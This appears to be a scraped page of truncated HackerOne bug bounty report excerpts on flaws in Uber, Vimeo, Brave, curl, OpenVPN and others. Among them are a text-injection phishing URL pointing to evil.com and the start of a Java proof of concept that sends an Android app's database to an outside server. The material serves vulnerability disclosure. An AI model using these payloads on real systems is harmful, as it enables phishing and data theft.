HackerOne Reports
INTRO: I want to report a text injection and a misconfiguration of the 404 page which can be used for phishing at faspex.uber.com EXPLOITABILITY: PoC link : https://faspex.uber.com/faspex.uber.com/%2f../It%20has%20been%20changed%20by%20a%20new%20one%20http://www.evil.com%20so%20go%20to%20the%20new%20one%20since%20this%20one IMPACT: The issue can be used by an attacker to spoof content and for phishing purposes FIX: Using a predefined 404 page will …
https://bugs.php.net/bug.php?id=70713 I think this bug is still a security issue since it can still be triggered remotely in some real-world apps. Example: https://github.com/zendframework/zend-loader/blob/ceb32b5129525e1f19b01f37dbbcc6398b0a9635/src/ClassMapAutoloader.php#L210-L215

```php
array_walk($parts, function ($value, $key) use (&$parts) {
    if ($value === '..') {
        unset($parts[$key], $parts[$key-1]);
        $parts = array_values($parts); // <== ['x', 'y', '..'] will be changed into ['x'] …
```
ryat
Vulnerability Name: User Enumeration and Information Disclosure Description: It was possible to enumerate users for the SquareSpace admin console in uber-movement. Please find below details of the users enumerated: 1. [email protected] 2. [email protected] Information disclosure in https://uber-movement.squarespace.com/?format=json helped me enumerate users for https://uber-movement.squarespace.com/config Please find the attached document for proof of concept.
Hi team, First, I think this vulnerability doesn't fall under your bug bounty program, but this is a bad design that should be fixed right now, because if an attacker gets admin access he can still upload a malicious file on the client server side. I saw that Logo & Log in …
Hello Jeremy and Vimeo Security Team, There is a vulnerability in Vimeo which allows any user to watch a password-protected video without the password. A user can like a passworded video without the password, and then the user can watch the video in Couchmode without the password. POC link : http://opnsec.com/vimeo/PasswordBypass.html Description : …
### Multiple accounts can be created using the same X-csrf token! I have tested and created around 45+ accounts this way! Take a look at the attachment! I have created accounts ranging from test1-test27, 3 times! The file of the test accounts created is also attached!
Description ==================== Adding a mobile number for 2-factor authentication is vulnerable to CSRF, allowing an attacker to bypass 2-factor authentication. An attacker would be able to force the logged in user to add a new mobile number for 2-factor authentication. The attacker would then receive the SMS code and automatically …
## Summary: The Brave browser has a built-in WebTorrent extension. After it finishes downloading a torrent, it serves the downloaded files on a local HTTP server listening on a random port. The problem is that the local HTTP server doesn't check the hostname of the requesters, so a malicious remote website …
## Summary: https://www.jamieweb.net still supports the TLS 1.0 protocol, which has several flaws. ## Vulnerability: With an SSL security scanner I was able to identify that an insecure transport security protocol (TLS 1.0) is still supported by your web server. TLS 1.0 has several flaws. An attacker can cause connection failures …
> NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report! **Summary:** [add summary of …
curl's HSTS functionality fails when multiple URLs are requested serially. Using its HSTS support, curl can be instructed to use HTTPS instead of an insecure clear-text HTTP step even when HTTP is given in the URL. This HSTS mechanism would however surprisingly be ignored by subsequent transfers when done …
## Summary: Build jobs [`mingw64 | openssl-1.1.1d`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L87) and [`mingw32 | openssl-1.0.2u`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L91) download dependencies from `build.openvpn.net` and `www.oberhumer.com` over an insecure channel (`http`, _not_ `https`) and do not check their integrity in any way. This opens the door to person-in-the-middle attacks, whereby an attacker controlling an intermediate node on the network path …
Followup from #311460 #Summary Self-XSS and CSRF are both out of scope, but when paired it is possible to create an attack on a user. #Description A favorites folder with an XSS payload as its name will launch when saving an image to said folder. This can be verified …
Hi team, While performing security testing of your website I have found the vulnerability called Clickjacking. What is Clickjacking? Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they …
**Summary:** Service

```xml
<service android:enabled="true" android:exported="true" android:name="net.gotev.uploadservice.UploadService"/>
```

is enabled and exported. If it's exported, it means that any third-party application can access it and send arbitrary data into it. The following code sends the main database file to an arbitrary server (I used http://google.com/zaheck):

```java
UploadTaskParameters params = new UploadTaskParameters();
params.setId("1337");
…
```
## Summary: The `download` attribute on an `a` tag allows downloading the `href` target to a file and saving it locally. In Mozilla and Chrome it is forbidden to download a local file via `file:// ..`; in Brave, however, this is not enforced and it is not clear to the user …